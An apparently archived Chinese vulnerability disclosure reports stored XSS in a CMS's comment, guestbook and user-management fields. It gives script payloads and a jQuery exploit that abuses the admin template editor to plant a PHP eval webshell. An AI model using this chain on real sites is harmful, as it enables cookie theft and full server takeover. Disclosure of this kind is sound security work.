### 简要描述:
求审核啊,乌云是不是不重视xss了,可是这是通用性哟。而且也不是弹窗啊,getshell利用方法都给各位想好了……
### 详细说明:
不知为何之前提交的一个投稿处的xss一直不审核。是不是要注册会员过于鸡肋,反正这网站各种xss,我干脆一起提交了吧。
1.文章评论处xss,需要改包,无需登录:`</textarea><script>alert(document.cookie)</script>`
2.留言板处xss,无需登录:`</textarea><script>alert(document.cookie)</script>`
3.用户管理处xss,需要改包:`</textarea><script>alert(document.cookie)</script>`
[<img src="https://images.seebug.org/upload/201401/05150023c2f20aab3b574d8b63874952d6e71d33.jpg" alt="01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/05150023c2f20aab3b574d8b63874952d6e71d33.jpg)
利用方法:
外连如下javascript:
```
$(document).ready(function(){
var code = "<?php eval($_POST[f4ckkk]); ?><?php return array ( 'name' => '最新默认模板2013-2-1', 'author' => 'yx',); ?> ";
$.post("/tmp/index.php?r=admin/set/tpedit&Mname=default&fname=info.php", {
"code": code
},function(data){});
});
```
执行后成功写入webshell:
[<img src="https://images.seebug.org/upload/201401/051501053c98af78a09fb91af9c55d2dfc8f7c97.jpg" alt="04.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/051501053c98af78a09fb91af9c55d2dfc8f7c97.jpg)
一句话位置:http://xxxx/protected/apps/default/view/default/info.php
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201401/05150128e6e00578826a512152db5e95c3dae329.jpg" alt="05.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/05150128e6e00578826a512152db5e95c3dae329.jpg)
暂无评论